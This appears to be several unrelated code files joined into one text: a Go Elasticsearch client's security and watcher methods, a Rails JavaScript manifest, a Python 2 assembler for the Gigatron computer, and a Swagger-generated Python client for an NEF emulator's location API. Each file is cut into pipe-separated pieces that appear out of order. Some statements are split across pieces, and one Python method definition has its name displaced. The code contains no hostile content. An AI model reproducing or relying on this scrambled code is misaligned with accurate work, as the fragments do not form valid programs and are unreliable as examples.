func (c *Client) XPackSecurityPutRoleMapping(roleMappingName string) *XPackSecurityPutRoleMappingService {
return NewXPackSecurityPutRoleMappingService(c).Name(roleMappingName)
}
// XPackSecurityDeleteRoleMapping deletes a role mapping.
func (c *Client) XPackSecurityDeleteRoleMapping(roleMappingName string) *XPackSecurityDeleteRoleMappingService {
return NewXPackSecurityDeleteRoleMappingService(c).Name(roleMappingName)
}
// XPackSecurityGetRole gets a role.
func (c *Client) XPackSecurityGetRole(roleName string) *XPackSecurityGetRoleService {
return NewXPackSecurityGetRoleService(c).Name(roleName)
}
// XPackSecurityPutRole adds a role.
func (c *Client) XPackSecurityPutRole(roleName string) *XPackSecurityPutRoleService {
return NewXPackSecurityPutRoleService(c).Name(roleName)
}
// XPackSecurityDeleteRole deletes a role.
func (c *Client) XPackSecurityDeleteRole(roleName string) *XPackSecurityDeleteRoleService {
return NewXPackSecurityDeleteRoleService(c).Name(roleName)
}
// TODO: Clear role cache API
// https://www.elastic.co/guide/en/elasticsearch/reference/7.0/security-api-clear-role-cache.html
// XPackSecurityChangePassword changes the password of users in the native realm.
func (c *Client) XPackSecurityChangePassword(username string) *XPackSecurityChangePasswordService {
return NewXPackSecurityChangePasswordService(c).Username(username)
}
// XPackSecurityGetUser gets details about one or more users.
func (c *Client) XPackSecurityGetUser(usernames ...string) *XPackSecurityGetUserService {
return NewXPackSecurityGetUserService(c).Usernames(usernames...)
}
// XPackSecurityPutUser adds or updates a user.
func (c *Client) XPackSecurityPutUser(username string) *XPackSecurityPutUserService {
return NewXPackSecurityPutUserService(c).Username(username)
}
// XPackSecurityEnableUser enables a user.
func (c *Client) XPackSecurityEnableUser(username string) *XPackSecurityEnableUserService {
return NewXPackSecurityEnableUserService(c).Username(username)
}
// XPackSecurityDisableUser disables a user.
func (c *Client) XPackSecurityDisableUser(username string) *XPackSecurityDisableUserService {
return NewXPackSecurityDisableUserService(c).Username(username)
}
// XPackSecurityDeleteUser deletes a user.
func (c *Client) XPackSecurityDeleteUser(username string) *XPackSecurityDeleteUserService {
return NewXPackSecurityDeleteUserService(c).Username(username)
}
// -- X-Pack Watcher --
// XPackWatchPut adds a watch.
func (c *Client) XPackWatchPut(watchId string) *XPackWatcherPutWatchService {
return NewXPackWatcherPutWatchService(c).Id(watchId)
}
// XPackWatchGet gets a watch.
func (c *Client) XPackWatchGet(watchId string) *XPackWatcherGetWatchService {
return NewXPackWatcherGetWatchService(c).Id(watchId)
}
// XPackWatchDelete deletes a watch.
func (c *Client) XPackWatchDelete(watchId string) *XPackWatcherDeleteWatchService {
return NewXPackWatcherDeleteWatchService(c).Id(watchId)
}
// XPackWatchExecute executes a watch.
func (c *Client) XPackWatchExecute() *XPackWatcherExecuteWatchService {
return NewXPackWatcherExecuteWatchService(c)
}
// XPackWatchAck acknowledging a watch.
func (c *Client) XPackWatchAck(watchId string) *XPackWatcherAckWatchService {
return NewXPackWatcherAckWatchService(c).WatchId(watchId)
}
// XPackWatchActivate activates a watch.
func (c *Client) XPackWatchActivate(watchId string) *XPackWatcherActivateWatchService {
return NewXPackWatcherActivateWatchService(c).WatchId(watchId)
}
// XPackWatchDeactivate deactivates a watch.
func (c *Client) XPackWatchDeactivate(watchId string) *XPackWatcherDeactivateWatchService {
return NewXPackWatcherDeactivateWatchService(c).WatchId(watchId)
}
// XPackWatchStats returns the current Watcher metrics.
func (c *Client) XPackWatchStats() *XPackWatcherStatsService {
return NewXPackWatcherStatsService(c)
}
// XPackWatchStart starts a watch.
func (c *Client) XPackWatchStart() *XPackWatcherStartService {
return NewXPackWatcherStartService(c)
}
// XPackWatchStop stops a watch.
func (c *Client) XPackWatchStop() *XPackWatcherStopService {
return NewXPackWatcherStopService(c)
}
// -- Helpers and shortcuts --
// ElasticsearchVersion returns the version number of Elasticsearch
// running on the given URL.
func (c *Client) ElasticsearchVersion(url string) (string, error) {
res, _, err := c.Ping(url).Do(context.Background())
if err != nil {
return "", err
}
return res.Version.Number, nil
}
// IndexNames returns the names of all indices in the cluster.
func (c *Client) IndexNames() ([]string, error) {
res, err := c.IndexGetSettings().Index("_all").Do(context.Background())
if err != nil {
return nil, err
}
var names []string
for name := range res {
names = append(names, name)
}
return names, nil
}
// Ping checks if a given node in a cluster exists and (optionally)
// returns some basic information about the Elasticsearch server,
// e.g. the Elasticsearch version number.
//
// Notice that you need to specify a URL here explicitly.
func (c *Client) Ping(url string) *PingService {
return NewPingService(c).URL(url)
}
// WaitForStatus waits for the cluster to have the given status.
// This is a shortcut method for the ClusterHealth service.
//
// WaitForStatus waits for the specified timeout, e.g. "10s".
// If the cluster will have the given state within the timeout, nil is returned.
// If the request timed out, ErrTimeout is returned.
func (c *Client) WaitForStatus(status string, timeout string) error {
health, err := c.ClusterHealth().WaitForStatus(status).Timeout(timeout).Do(context.Background())
if err != nil {
return err
}
if health.TimedOut {
return ErrTimeout
}
return nil
}
// WaitForGreenStatus waits for the cluster to have the "green" status.
// See WaitForStatus for more details.
func (c *Client) WaitForGreenStatus(timeout string) error {
return c.WaitForStatus("green", timeout)
}
// WaitForYellowStatus waits for the cluster to have the "yellow" status.
// See WaitForStatus for more details.
func (c *Client) WaitForYellowStatus(timeout string) error {
return c.WaitForStatus("yellow", timeout)
}
| {
return func(c *Client) error {
c.basicAuthUsername = username
c.basicAuthPassword = password
c.basicAuth = c.basicAuthUsername != "" || c.basicAuthPassword != ""
return nil
}
} |
application-turbolinks.js | // This is a manifest file that'll be compiled into including all the files listed below.
// Add new JavaScript/Coffee code in separate files in this directory and they'll automatically
// be included in the compiled file accessible from http://example.com/assets/application.js
// It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the
// the compiled file. | //= require jquery_ujs
//= require 'turbolinks'
//= require dummy/dummy.js
//= require init.js | //
//= require jquery |
asm.py | # SYNOPSIS: from asm import *
from os.path import basename, splitext
from sys import argv
# Module variables because I don't feel like making a class
_romSize, _maxRomSize, _zpSize = 0, 0, 1
_symbols, _refsL, _refsH = {}, [], []
_labels = {} # Inverse of _symbols, but only when made with label(). For disassembler
_comments = {}
_rom0, _rom1 = [], []
# Bus access
busD = 0
busRAM = 1
busAC = 2
busIN = 3
# Addressing modes
#
# How addresses into RAM are composed.
# In a sufficiently large RAM system there must be both immediate
# (absolute) addresses and computed addresses.
#
# A reasonable EAU could comprise of a 16-bit data pointer, DP, to which
# an immediate 8-bit offset is optionally added, with the option to disable
# the DP (so we have zero page addressing). Such a unit requires 4 TTL
# adders + 6 TTL AND chips = 10 TTL chips.
#
# Our EA unit is a "poor man's" EAU that supports some workable combinations.
# There is no addition, so no linear address space, just selecting which
# part go into which half. It uses 4 TTL chips. The data pointer DP is
# replaced with 8-bit X and 8-bit Y.
#
# Register and addressing modes are compacted to 8 combinations
#
ea0DregAC = 0 << 2
ea0XregAC = 1 << 2
eaYDregAC = 2 << 2
eaYXregAC = 3 << 2
ea0DregX = 4 << 2
ea0DregY = 5 << 2
ea0DregOUT = 6 << 2
eaYXregOUTIX = 7 << 2 # post-increment of X
# Store instructions
def ea0D(v): return ea0DregAC | d(v)
ea0X = ea0XregAC
def eaYD(v): return eaYDregAC | d(v)
eaYX = eaYXregAC
eaYXinc = eaYXregOUTIX
# Load/exec instructions (without memory)
regAC = ea0DregAC
regX = ea0DregX
regY = ea0DregY
regOUT = ea0DregOUT
# Immediate value
#
# Immediate means that the value used is encoded within the program stream,
# instead of, for example, coming from a register or memory location.
#
def val(v): return busD | d(v)
def d(v): return ((v & 255) << 8)
def ram(ea): return busRAM | ea
# General instruction layout
_maskOp = 0b11100000
_maskMode = 0b00011100
_maskCc = 0b00011100
_maskBus = 0b00000011
# Operations
_opLD = 0 << 5
_opAND = 1 << 5
_opOR = 2 << 5
_opXOR = 3 << 5
_opADD = 4 << 5
_opSUB = 5 << 5
_opST = 6 << 5
_opJ = 7 << 5
# No operation
_nops = [_opLD | regAC | busAC,
_opAND | regAC | busAC,
_opOR | regAC | busAC ]
_clrs = [_opXOR | regAC | busAC,
_opSUB | regAC | busAC ]
# Jump conditions
#
# During jump, the ALU is wired to calculate "-AC".
# Only the overflow flag is looked at. The negation result itself is not used and discarded.
# Only in case of all zero bits, -AC overflows the ALU. So the overflow acts as a zero flag (Z).
# If we look at bit 7 of AC, we know if AC is negative or positive.
# What does the combination of two signals tell us:
#
# Z bit7
# 0 0 | AC>0 | 0 1 0 1 0 1 0 1 Instruction bit 2
# 0 1 | AC<0 | 0 0 1 1 0 0 1 1 Instruction bit 3
# 1 0 | AC=0 | 0 0 0 0 1 1 1 1 Instruction bit 4
# 1 1 | n/a -------------------------
# F GT LT NE EQ GE LE T Condition code ("F" is repurposed for long jumps)
jL = 0 << 2
jGT = 1 << 2
jLT = 2 << 2
jNE = 3 << 2
jEQ = 4 << 2
jGE = 5 << 2
jLE = 6 << 2
jS = 7 << 2
_mnemonics = [ 'ld', 'anda', 'ora', 'xora', 'adda', 'suba', 'st', 'j' ]
def _hexString(val):
return '$%02x' % val
def label(name):
address = _romSize
define(name, address)
if address not in _labels:
_labels[address] = [] # There can be more than one
_labels[_romSize].append(name)
def C(line):
"""Insert comment to print in disassembly"""
if line:
address = max(0, _romSize-1)
if address not in _comments:
_comments[address] = []
_comments[address].append(line)
return None
def define(name, value):
global _symbols
_symbols[name] = value
def symbol(name):
return _symbols[name] if name in _symbols else None
def lo(name):
global _refsL
_refsL.append((name, _romSize))
return 0 # placeholder
def hi(name):
global _refsH
_refsH.append((name, _romSize))
return 0 # placeholder
def disassemble(opcode, operand, address=None):
text = _mnemonics[opcode >> 5] # (74LS155)
isStore = (opcode & 0xe0) == _opST
# Decode addressing and register mode (74LS138)
if text != 'j':
if opcode & _maskMode == ea0DregAC: ea, reg = '[%s]' % _hexString(operand), 'ac'
if opcode & _maskMode == ea0XregAC: ea, reg = '[x]', 'ac'
if opcode & _maskMode == eaYDregAC: ea, reg = '[y,%s]' % _hexString(operand), 'ac'
if opcode & _maskMode == eaYXregAC: ea, reg = '[y,x]', 'ac'
if opcode & _maskMode == ea0DregX: ea, reg = '[%s]' % _hexString(operand), 'x'
if opcode & _maskMode == ea0DregY: ea, reg = '[%s]' % _hexString(operand), 'y'
if opcode & _maskMode == ea0DregOUT: ea, reg = '[%s]' % _hexString(operand), 'out'
if opcode & _maskMode == eaYXregOUTIX: ea, reg = '[y,x++]', 'out'
else:
ea = '[%s]' % _hexString(operand)
# Decode bus mode (74LS139)
if opcode & _maskBus == busD: bus = _hexString(operand)
if opcode & _maskBus == busRAM: bus = '$??' if isStore else ea
if opcode & _maskBus == busAC: bus = 'ac'
if opcode & _maskBus == busIN: bus = 'in'
if text == 'j':
# Decode jumping mode (74LS153)
if opcode & _maskCc == jL: text = 'jmp y,'
if opcode & _maskCc == jS: text = 'bra '
if opcode & _maskCc == jEQ: text = 'beq '
if opcode & _maskCc == jNE: text = 'bne '
if opcode & _maskCc == jGT: text = 'bgt '
if opcode & _maskCc == jGE: text = 'bge '
if opcode & _maskCc == jLT: text = 'blt '
if opcode & _maskCc == jLE: text = 'ble '
if address is not None and opcode & _maskCc != jL and opcode & _maskBus == busD:
# We can calculate the destination address
# XXX Except when the previous instruction is a far jump (jmp y,...)
lo, hi = address&255, address>>8
if lo == 255: # When branching from $xxFF, we still end up in the next page
hi = (hi + 1) & 255
destination = (hi << 8) + operand
if destination in _labels:
bus = _labels[destination][-1]
else:
bus = '$%04x' % destination
text += bus
else:
# Compose string
if isStore:
if bus == 'ac':
text = '%-4s %s' % (text, ea)
else:
text = '%-4s %s,%s' % (text, bus, ea)
if reg != 'ac' and reg != 'out': # X and Y are not muted
text += ',' + reg
else:
if reg == 'ac':
text = '%-4s %s' % (text, bus)
else:
text = '%-4s %s,%s' % (text, bus, reg)
# Specials
if opcode in _nops: text = 'nop'
if opcode in _clrs: text = 'clr'
# Emit as text
return text
def _emit(ins):
global _rom0, _rom1, _romSize, _maxRomSize
opcode, operand = ins & 255, ins >> 8
if _romSize >= _maxRomSize:
disassembly = disassemble(opcode, operand)
print '%04x %02x%02x %s' % (_romSize, opcode, operand, disassembly)
print 'Error: Program size limit exceeded'
_maxRomSize = 0x10000 # Extend to full address space to prevent more of the same errors
_rom0.append(opcode)
_rom1.append(operand)
_romSize += 1
# Warning for conditional branches with a target address from RAM. The (unverified) danger is
# that the ALU is calculating `-A' (for the condition decoder) as L+R+1, with L=0 and R=~A. But B
# is also an input to R and comes from memory. The addressing mode is [D], which requires high
# EH and EL, and this is slower when the diodes are forward biased from the previous instruction.
# Therefore R might momentarily glitch while B changes value and the AND/OR layers in the 74153
# multiplexer resettles. Such a glitch then potentially ripples all the way through two 74283
# adders and the control unit's 74153. This all depends on the previous instruction's addressing
# mode and the values of AC and [D], which we can't know with static analysis.
if opcode & _maskOp == _opJ and\
opcode & _maskBus == busRAM and\
opcode & _maskCc in [ jGT, jLT, jNE, jEQ, jGE, jLE ]:
disassembly = disassemble(opcode, operand)
print '%04x %02x%02x %s' % (_romSize, opcode, operand, disassembly)
print 'Warning: large propagation delay (conditional branch with RAM on bus)'
def ld (base, reg=regAC, flags=0): _emit(_opLD | base | reg | flags)
def anda(base, reg=regAC, flags=0): _emit(_opAND | base | reg | flags)
def ora (base, reg=regAC, flags=0): _emit(_opOR | base | reg | flags)
def xora(base, reg=regAC, flags=0): _emit(_opXOR | base | reg | flags)
def adda(base, reg=regAC, flags=0): _emit(_opADD | base | reg | flags)
def suba(base, reg=regAC, flags=0): _emit(_opSUB | base | reg | flags)
def jmpy(base): _emit(_opJ | jL | base)
def bra (base): _emit(_opJ | jS | base)
def beq (base): _emit(_opJ | jEQ | base)
def bne (base): _emit(_opJ | jNE | base)
def bgt (base): _emit(_opJ | jGT | base)
def blt (base): _emit(_opJ | jLT | base)
def bge (base): _emit(_opJ | jGE | base)
def ble (base): _emit(_opJ | jLE | base)
bpl = bge # Alias
bmi = blt # Alias
def nop (): _emit(_nops[0])
def clr (): _emit(_clrs[0])
def st (base1, base2=busAC): _emit(_opST | base1 | base2)
def out (base=busAC): _emit(_opLD | base | regOUT)
def ldzp (base): _emit(_opLD | busRAM | ea0DregAC | base)
def ldzpx(base): _emit(_opLD | busRAM | ea0DregX | base)
def ldzpy(base): _emit(_opLD | busRAM | ea0DregY | base)
def align(n, chunkSize=0x10000):
global _romSize, _maxRomSize
_maxRomSize = 0x10000
while _romSize % n > 0:
nop()
_maxRomSize = min(_maxRomSize, _romSize + chunkSize)
def wait(n):
comment = 'Wait %s cycle%s' % (n, '' if n==1 else 's')
assert n >= 0
if n > 4:
n -= 1
ld(val(n/2 - 1))
comment = C(comment)
bne(d(_romSize & 255))
suba(val(1))
n = n % 2
while n > 0:
nop()
n -= 1
def pc():
return _romSize
def zpByte(len=1):
global _zpSize
s = _zpSize
if s <= 0x80 and 0x80 < s + len:
s = 0x81 # Keep 0x80 reserved
_zpSize = s+len
assert _zpSize <= 0x100
return s
def zpReset(startFrom=1):
global _zpSize
_zpSize = startFrom
def trampoline():
"""Read 1 byte from ROM page"""
while pc()&255 < 256-5:
nop()
bra(busAC); #13
"""
It is possible to make this section 2 bytes shorter
and 1 cycle faster by entering directly wih "jmp y,ac"
instead of "jmp y,251". However, this will cost two
words at 'LUP' in vCPU and space is expensive there.
"""
C('+-----------------------------------+')
bra(val(253)) #14
C('| |')
ld(d(hi('lupReturn')),regY) #15
C('| Trampoline for page $%04x lookups |' % (pc()&~255))
jmpy(d(lo('lupReturn'))) #17
C('| |')
st(d(lo('vAC'))) #18
C('+-----------------------------------+')
def end():
errors = 0
global _rom0, _rom1, _romSize
global _refsL
for name, where in _refsL:
if name in _symbols:
_rom1[where] ^= _symbols[name] & 255 # xor allows some label tricks
else:
print 'Error: Undefined symbol %s' % repr(name)
errors += 1
global _refsH
for name, where in _refsH:
if name in _symbols:
_rom1[where] += _symbols[name] >> 8
else:
print 'Error: Undefined symbol %s' % repr(name)
errors += 1
if errors:
print '%d error(s)' % errors
exit()
# Determine stem for file names
stem, ext = splitext(argv[0])
stem = basename(stem)
if stem == '': stem = 'out'
# Disassemble for readability
filename = stem + '.asm'
print 'Create file', filename
with open(filename, 'w') as file:
file.write(' address\n'
' | encoding\n'
' | | instruction\n'
' | | | operands\n'
' | | | |\n'
' V V V V\n')
address = 0
repeats, previous, postponed = 0, None, None
maxRepeat = 3
for instruction in zip(_rom0, _rom1):
# Check if there is a label defined for this address
label = _labels[address][-1] + ':' if address in _labels else ''
comment = _comments[address][0] if address in _comments else ''
if instruction != previous or label or comment:
repeats, previous = 0, instruction
if postponed:
file.write(postponed)
postponed = None
if label:
for extra in _labels[address][:-1]:
file.write(extra+':\n') # Extra labels get their own line
if len(label) > 13:
label += '\n' + (13 * ' ')
else:
repeats += 1
if repeats <= maxRepeat:
opcode, operand = instruction
disassembly = disassemble(opcode, operand, address)
if comment:
line = '%-13s %04x %02x%02x %-16s ;%s\n' % (label, address, opcode, operand, disassembly, comment)
else:
line = '%-13s %04x %02x%02x %s\n' % (label, address, opcode, operand, disassembly)
if repeats < maxRepeat:
file.write(line) # always write first N | file.write(42*' ' + ';%s\n' % extra)
if repeats == maxRepeat:
postponed = line # if this turns out to be the last repeat, emit the line
if repeats > maxRepeat: # now it makes sense to abbreviate the output
postponed = 14*' '+'* %d times\n' % (1+repeats)
address += 1
if postponed:
file.write(postponed)
file.write(14*' '+'%04x\n' % address)
assert(len(_rom0) == _romSize)
assert(len(_rom1) == _romSize)
# Write ROM files
filename = stem + '.0.rom'
print 'Create file', filename
with open(filename, 'wb') as file:
file.write(''.join([chr(byte) for byte in _rom0]))
filename = stem + '.1.rom'
print 'Create file', filename
with open(filename, 'wb') as file:
file.write(''.join([chr(byte) for byte in _rom1]))
# 16-bit version for 27C1024, little endian
filename = stem + '.2.rom'
print 'Create file', filename
_rom2 = []
for x, y in zip(_rom0, _rom1):
_rom2.append(x)
_rom2.append(y)
# Padding
while len(_rom2) < 2*_maxRomSize:
_rom2.append(ord('Gigatron!'[ (len(_rom2)-2*_maxRomSize) % 9 ]))
# Write ROM file
with open(filename, 'wb') as file:
file.write(''.join([chr(byte) for byte in _rom2]))
print 'OK used %d free %d size %d' % (_romSize, _maxRomSize-_romSize, len(_rom2)) | if comment:
for extra in _comments[address][1:]: |
location_frontend_api.py | # coding: utf-8
"""
NEF_Emulator
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 0.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from evolved5g.swagger_client.api_client import ApiClient
class LocationFrontendApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_path_api_v1_frontend_location_post(self, body, **kwargs): # noqa: E501
"""Create Path # noqa: E501
Create new path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_path_api_v1_frontend_location_post(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PathCreate body: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_path_api_v1_frontend_location_post_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_path_api_v1_frontend_location_post_with_http_info(body, **kwargs) # noqa: E501
return data
def create_path_api_v1_frontend_location_post_with_http_info(self, body, **kwargs): # noqa: E501
"""Create Path # noqa: E501
Create new path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_path_api_v1_frontend_location_post_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PathCreate body: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_path_api_v1_frontend_location_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_path_api_v1_frontend_location_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/frontend/location/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Path', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_path_api_v1_frontend_location_id_delete(self, id, **kwargs): # noqa: E501
"""Delete Path # noqa: E501
Delete an path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_path_api_v1_frontend_location_id_delete(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_path_api_v1_frontend_location_id_delete_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_path_api_v1_frontend_location_id_delete_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_path_api_v1_frontend_location_id_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete Path # noqa: E501
Delete an path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_path_api_v1_frontend_location_id_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_path_api_v1_frontend_location_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_path_api_v1_frontend_location_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/frontend/location/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Path', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_path_api_v1_frontend_location_id_get(self, id, **kwargs): # noqa: E501
"""Read Path # noqa: E501
Get path by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_path_api_v1_frontend_location_id_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_path_api_v1_frontend_location_id_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.read_path_api_v1_frontend_location_id_get_with_http_info(id, **kwargs) # noqa: E501
return data
def read_path_api_v1_frontend_location_id_get_with_http_info(self, id, **kwargs): # noqa: E501
"""Read Path # noqa: E501
Get path by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_path_api_v1_frontend_location_id_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_path_api_v1_frontend_location_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `read_path_api_v1_frontend_location_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/frontend/location/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Path', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_paths_api_v1_frontend_location_get(self, **kwargs): # noqa: E501
"""Read Paths # noqa: E501
Retrieve paths. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_paths_api_v1_frontend_location_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int skip:
:param int limit:
:return: list[Path]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_paths_api_v1_frontend_location_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.read_paths_api_v1_frontend_location_get_with_http_info(**kwargs) # noqa: E501
return data
def read_paths_api_v1_frontend_location_get_with_http_info(self, **kwargs): # noqa: E501
"""Read Paths # noqa: E501
Retrieve paths. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_paths_api_v1_frontend_location_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int skip:
:param int limit:
:return: list[Path]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['skip', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_paths_api_v1_frontend_location_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'skip' in params:
query_params.append(('skip', params['skip'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/frontend/location/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Path]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_path_api_v1_frontend_location_id_put(self, body, id, **kwargs): # noqa: E501
"""Update Path # noqa: E501
Update an path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_path_api_v1_frontend_location_id_put(body, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PathUpdate body: (required)
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_path_api_v1_frontend_location_id_put_with_http_info(body, id, **kwargs) # noqa: E501
else:
(data) = self.update_path_api_v1_frontend_location_id_put_with_http_info(body, id, **kwargs) # noqa: E501
return data
def | (self, body, id, **kwargs): # noqa: E501
"""Update Path # noqa: E501
Update an path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_path_api_v1_frontend_location_id_put_with_http_info(body, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PathUpdate body: (required)
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_path_api_v1_frontend_location_id_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_path_api_v1_frontend_location_id_put`") # noqa: E501
